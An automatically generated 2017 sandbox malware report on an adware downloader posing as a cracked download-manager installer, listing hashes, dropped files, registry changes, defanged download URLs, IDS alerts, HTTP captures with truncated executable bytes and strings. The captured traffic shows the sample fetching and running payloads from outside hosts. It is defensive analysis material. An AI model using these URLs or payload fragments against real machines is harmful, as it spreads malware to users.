Trojan.GenericKD.4573345_38e137fe27

by malwarelabrobot on June 6th, 2017 in Malware Descriptions.

TrojanDownloader:Win32/Adload.DP!bit (Microsoft), Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.Vittalia.7648 (DrWeb), Artemis!38E137FE27B1 (McAfee), Trojan.Gen (Symantec), Win32:Malware-gen (Avast), TROJ_GEN.R00XC0DBD17 (TrendMicro), Trojan.GenericKD.4573345 (AdAware), Installer.Win32.SmartIM.FD, Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR, InstallerSmartIM.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Installer, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 38e137fe27b181dc3415456e673eaacb
SHA1: 3e8ea1457fec13c03678767753c482bb432911e9
SHA256: b16fb65febd4ae205fab20423476bf43a0f29c0c44f46de8500725f779b0140d
SSDeep: 49152:bAI lwQVCzKFUcPKlpoVGgAd472Hpbji/P:bAI 2QMiUaKP GgABH1sP
Size: 2066448 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

setup.exe:772
open.exe:1968
RTOBwd4yYx.exe:3396

The Trojan injects its code into the following process(es):

%original file name%.exe:1796

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\16.tmp (838 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\7.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\4.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\$inst\2.tmp (14 bytes)

The process %original file name%.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\launch_reb[1].htm (189 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\vHbOehhRxp (189 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\5934c6c0dd069[1].exe (4648 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\RTOBwd4yYx.exe (6029 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\B (32454 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2480.tmp (0 bytes)

The process open.exe:1968 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsc9DD4.tmp (0 bytes)

The process RTOBwd4yYx.exe:3396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E12.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\open.exe (7539 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\NSISdl.dll (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\397086727 (956 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\nsArray.dll (14 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\Setup__21223_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E11.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\397086727 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\open.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\NSISdl.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr2E13.tmp\nsArray.dll (0 bytes)

Registry activity

The process %original file name%.exe:1796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\38e137fe27b181dc3415456e673eaacb_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process open.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

Dropped PE files

MD5 File path
5d930fa790eed4b6c7dd22262a015723 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\28983039778[1].exe
45a5c7027332eba59179f6fc24c439ce c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\5934c6c0dd069[1].exe
45a5c7027332eba59179f6fc24c439ce c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\RTOBwd4yYx.exe
c17103ae9072a06da581dec998343fc1 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\inetc.dll
503b679b2ae49e6793ff8da172a8d41f c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\setup.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 233472 19448 19456 3.41705 537cb102bb82cffd7543847e9c582caa

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 6
e5b0307c654418c21876ee8da137d251
8d962126c41f196273a111417d8ee95d
a8f8da03cc88d82ed971c33e42a03aa1
60955768a2739d338252da6016c3f211
b60cfe12254e6c1dc7dc7bc1e2ecd6a9
17913c1466c45078b2234cc3053af41c

URLs

URL IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=12885062&pid=2268&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgzMmJpdCArIDY0Yml0IFBhdGNoKSBbQ3JhY2tpbmdQYXRjaGluZ10=&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching]
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=2268&tid=12885062&b_typ=pe&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgz&reb=1&ic=
hxxp://d2yevmf1zg53hf.cloudfront.net/?affId=1006&appTitle=IDM
hxxp://di5k50sh3hqjp.cloudfront.net/get.php?ses=1wJdBdqMTytMQjGzUYywKliRROW1
hxxp://promos-back.peerdlgo.info/stub/open_maker.php?dl=1 5.79.71.7
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=op&c=&step=
hxxp://di5k50sh3hqjp.cloudfront.net/ddl.php?file=77519782
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=&c=&step=1
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=&c=&step=2
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=&c=&step=3
hxxp://get.ercationiv.club/launch_reb.php?p=sevenzip&tid=12885062&pid=2268&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgzMmJpdCArIDY0Yml0IFBhdGNoKSBbQ3JhY2tpbmdQYXRjaGluZ10=&b_typ=pe 54.230.15.24
hxxp://buddy.bellverse.bid/get.php?ses=1wJdBdqMTytMQjGzUYywKliRROW1 54.230.15.23
hxxp://gold.bellverse.bid/stub_maker.php?program=sevenzip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching] 54.230.15.136
hxxp://meat.detailrobin.bid/?affId=1006&appTitle=IDM 6.27 Build 3 Registered (3&s1=2268&s2=12885062&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 54.230.15.35
hxxp://hold.fieldlow.bid/stats.php?bu=&c=&step=1 54.230.15.91
hxxp://hold.fieldlow.bid/stats.php?bu=&c=&step=3 54.230.15.91
hxxp://spark.comparisoneggs.website/ddl.php?file=77519782 54.230.15.83
hxxp://hold.fieldlow.bid/stats.php?bu=&c=&step=2 54.230.15.91
hxxp://fun.iciclebone.bid/launch_v5.php?p=sevenzip&pid=2268&tid=12885062&b_typ=pe&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgz&reb=1&ic= 54.230.15.234
hxxp://hold.fieldlow.bid/stats.php?bu=op&c=&step= 54.230.15.91
boo.quincefork.bid 54.230.15.247
www.bringmethefile.com
dns.msftncsi.com
birth.babieshistory.bid


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /stats.php?bu=&c=&step=1 HTTP/1.0
Host: hold.fieldlow.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Mon, 05 Jun 2017 02:50:08 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 36a14b9cb5cc947f05a9a38c2e38f707.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 63oNaA7BJosrOUNYP_2LQdgDUYi6lx3jmSD9WPQnq9ysiPfvfAzIpA==



GET /launch_reb.php?p=sevenzip&tid=12885062&pid=2268&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgzMmJpdCArIDY0Yml0IFBhdGNoKSBbQ3JhY2tpbmdQYXRjaGluZ10=&b_typ=pe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: get.ercationiv.club
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 189
Connection: keep-alive
Date: Mon, 05 Jun 2017 02:49:36 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 3fe3cb67da7e790ebadf1baabec782f6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 4HNOGzTT4QPyIG6JHDSvA8-auy7zSIKu4mVV2lp_XcwQgwpkrkKvAg==
s=first..u=hXXp://gold.bellverse.bid/stub_maker.php?program=sevenzip&t
id=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered %
2832bit + 64bit Patch) [CrackingPatching]HTTP/1.1 200 OK..Cont
ent-Type: text/html; charset=UTF-8..Content-Length: 189..Connection: k
eep-alive..Date: Mon, 05 Jun 2017 02:49:36 GMT..Server: Apache/2.2.15 
(CentOS)..X-Powered-By: PHP/5.3.3..X-Cache: Miss from cloudfront..Via:
 1.1 3fe3cb67da7e790ebadf1baabec782f6.cloudfront.net (CloudFront)..X-A
mz-Cf-Id: 4HNOGzTT4QPyIG6JHDSvA8-auy7zSIKu4mVV2lp_XcwQgwpkrkKvAg==..s=
first..u=hXXp://gold.bellverse.bid/stub_maker.php?program=sevenzip&tid
=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (
32bit + 64bit Patch) [CrackingPatching]..



GET /ddl.php?file=77519782 HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: spark.comparisoneggs.website
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1962408
Connection: keep-alive
Server: nginx/1.10.1
Date: Mon, 05 Jun 2017 02:50:07 GMT
X-Powered-By: PHP/5.5.38
Content-Description: File Transfer
Content-Disposition: attachment; filename=28983039778.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
X-Cache: Miss from cloudfront
Via: 1.1 56f2c719aefd3766bb3bccf085790735.cloudfront.net (CloudFront)
X-Amz-Cf-Id: QlL_WkomIEjMzqdpakO4sPEWe-1K705TxRH5rA4a0Rm3SV6ysCJKuw==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........gQ!..?r..?r
..?rj..r..?rj..rU.?rj..r..?r.[<s..?r.[;s..?r.[:s..?r.~.r..?r.~.r..?
r..>r&.?r.[:s..?r.[?s..?r.[.r..?r.[=s..?rRich..?r........PE..L...o.
.W..................... ......E.............@.........................
.0............@..........................|..4....}..(........h........
.......?......H....^..T...........................p...@...............
.....s.......................text............................... ..`.r
data..0...........................@..@.data................x..........
....@....gfids..............................@..@.rsrc....h.......j....
..............@..@.reloc..H........ ..................@..B............
......................................................................
......................................................................
......................................................................
..................................................U...M.VW.}...u..O .E
..G0.E..G4.G.PWh#.@.Q............t.~.............O....PQj.W........_..
^].U...u..E..u..u..p..p...........~.........].U..V.u..v..v.......f...f
..YY^].U...E.3.V...B...t......J...B..u. ..M..B..a...a...1.A.^].U...E.V
W3....B.....t......J.f.....f;.u. ....M...U.....y..y._.1.A.^].U...E(..t
j.M..U.S.].W.} ...t*...u(..t....A..........M..H..M..H..X..x.... ..M.V.
p0..t..p4.u$WSQ.u...R.u..u..X.....^_[].$.U...E..E.t-.U..J..B.#M.#E...t
..B..J.#E.#M.;B.u.;J.t.2.]...].U.......aC..U...V.u....aC..........
<<< skipped >>>


GET /get.php?ses=1wJdBdqMTytMQjGzUYywKliRROW1 HTTP/1.0
Host: buddy.bellverse.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 0
Connection: close
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 01 Jan 2014 00:00:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Access-Control-Allow-Origin: *
Date: Mon, 05 Jun 2017 02:48:50 GMT
X-Cache: Miss from cloudfront
Via: 1.1 9b873c22fb06a32f8142a90b7071aba9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: wmKb3PBlZxZE_ZbsQvffuQi-7zEOszHoiZDImsjtmH8DphzY6F7Qzw==



GET /stub_maker.php?program=sevenzip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching] HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: gold.bellverse.bid
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 76406
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="5934c6c0dd069.exe"
X-Powered-By: ASP.NET
Date: Mon, 05 Jun 2017 02:49:37 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3fe3cb67da7e790ebadf1baabec782f6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: VlQOvO2QLlivkwJ-bSq2lk4U2M9zPfA1rQDN1BpPVDIDoQvpcKqK8w==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......aKZe%*46%*46
%*46,R.6&*46,R.64*46%*56.*46>..6 *46>..6$*46>..6$*46Rich%*46.
.......PE..L.....GO.................r....>..B...9............@.....
......................O...........@.................................d.
........N.......................?.....................................
.................................................text...lp.......r....
.............. ..`.rdata...*.......,...v..............@..@.data....f&g
t;.........................@....ndata.......0?........................
..rsrc.........N.....................@..@.reloc..t2....N..4...........
.......@..B...........................................................
......................................................................
......................................................................
......................................................................
...........................................................U....\.}..t
 .}.F.E.u..H.....&...H.P.u..u..u.....@..K...SV.5.&..W.E.P.u.....@..e..
.E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E
...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@
..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E
......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..~.W....@..u.W
...u....E.P.u.....@._^3.[.....L$..(&....i. @...T.....tUVW.q.3.;5,&..sD
..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5,&..r
<<< skipped >>>


GET /stats.php?bu=op&c=&step= HTTP/1.0
Host: hold.fieldlow.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Mon, 05 Jun 2017 02:50:07 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 1e075734d681989d6cd80021b52ec2d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _0zm4lEJA6Bzj1dE5Kzxjt8zDBN1Hk2CdVVuyDIeoFGNXEIlXwwrtA==



GET /stats.php?bu=&c=&step=3 HTTP/1.0
Host: hold.fieldlow.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Mon, 05 Jun 2017 02:50:09 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 7d6b3813f81c0a2b16fe143c3b419156.cloudfront.net (CloudFront)
X-Amz-Cf-Id: lr-8SnKRhzchmCSzb2YS2YyFzuPH_w2vbTdBX1BFdb2G_HErmnlyVw==



GET /launch_v5.php?p=sevenzip&pid=2268&tid=12885062&b_typ=pe&n=SURNIDYuMjcgQnVpbGQgMyBSZWdpc3RlcmVkICgz&reb=1&ic= HTTP/1.0
Host: fun.iciclebone.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 956
Connection: close
Date: Mon, 05 Jun 2017 02:49:38 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 7e15ada42c415f2fda8358214d60c6de.cloudfront.net (CloudFront)
X-Amz-Cf-Id: uSQZ-zUfBISMyzOy_eDqXp8UtKGtGjuGVxXytFeL7UUxPx8B4eRAtA==
files=4.t1=dl.u1=hXXp://meat.detailrobin.bid/?affId=1006&appTitle=IDM 
6.27 Build 3 Registered (3&s1=2268&s2=12885062&setupName=cpSetup&appVe
rsion=2.92&instId=11&exe=1.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.m1=
0.d1=0.t2=dl.u2=hXXp://birth.babieshistory.bid/stub_maker_uk2.php?url=
hXXp://tragony.info/taveara?q=IDM 6.27 Build 3 Registered (3.n2=sevens
etup.exe.b2=rx.c2=sevenzip-1.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://VVV.bringm
ethefile.com/xdownload.php?version=1.1.5.26&monitor=1&z2=0&ci=21223&ap
psetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Se
tup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]
=http://pe-sixi.com/img/icon_installer.png.n3=Setup__21223_i
l2.exe.b3=am.c3=2140-sevenzip.s3=0.m3=0.d3=0.t4=dl.u4=hXXp://promos-ba
ck.peerdlgo.info/stub/open_maker.php?dl=1.n4=open.exe.b4=op.c4=sevenzi
p-1.s4=0.m4=0.d4=0.fn1=Components.fn2=File opener.fn3=File finder.fn4=
SevenZip.ftitle=to run your file.itype=silent...



GET /?affId=1006&appTitle=IDM 6.27 Build 3 Registered (3&s1=2268&s2=12885062&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 HTTP/1.0
Host: meat.detailrobin.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Connection: close
Server: nginx/1.10.1
Date: Mon, 05 Jun 2017 02:49:40 GMT
X-Powered-By: PHP/5.5.38
Location: hXXp://buddy.bellverse.bid/get.php?ses=1wJdBdqMTytMQjGzUYywKliRROW1
X-Cache: Miss from cloudfront
Via: 1.1 045e5b56f3f7e0d8f206766f7855c6f3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: dd9UcuBg6S8fLdMxNnbg__Bfds5GHP9zc_q38BohDr2ZRnECuPZDvg==



GET /stub/open_maker.php?dl=1 HTTP/1.0
Host: promos-back.peerdlgo.info
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/force-download
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="open.exe"
X-Powered-By: ASP.NET
Date: Mon, 05 Jun 2017 02:50:05 GMT
Connection: close
Content-Length: 51200
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
............ ............@.................................@..........
......................`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@..@.data.... ...........
...............@....ndata...................................rsrc......
.........................@..@.reloc..............................@..B.
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u...
..@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.....
..P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>


GET /stats.php?bu=&c=&step=2 HTTP/1.0
Host: hold.fieldlow.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Mon, 05 Jun 2017 02:50:08 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 a38c1bb63d8067c45471d0c8040eae61.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fFeJv8tklfXLgsXNho8hyXP1M1ad1xuUaB9Re4jVZUVihMUwRlDusA==







The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_1796:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
hu2.iu
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\setup.exe
id=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching]
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\B->C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\setup.exe
zip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching]
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\B
etc.dll
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
.reloc
System.dll
callback%d
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp
nsm2481.tmp
s\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\setup.exe
DM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching]
\"%CurrentUserName%"\AppData\Local\Temp\nsm2481.tmp\vHbOehhRxp
ip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching]
old.bellverse.bid/stub_maker.php?program=sevenzip&tid=12885062&pid=2268&b_typ=pe&reb=1&name=IDM 6.27 Build 3 Registered (32bit + 64bit Patch) [CrackingPatching]
c:\%original file name%.exe
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsm2480.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
201706050249
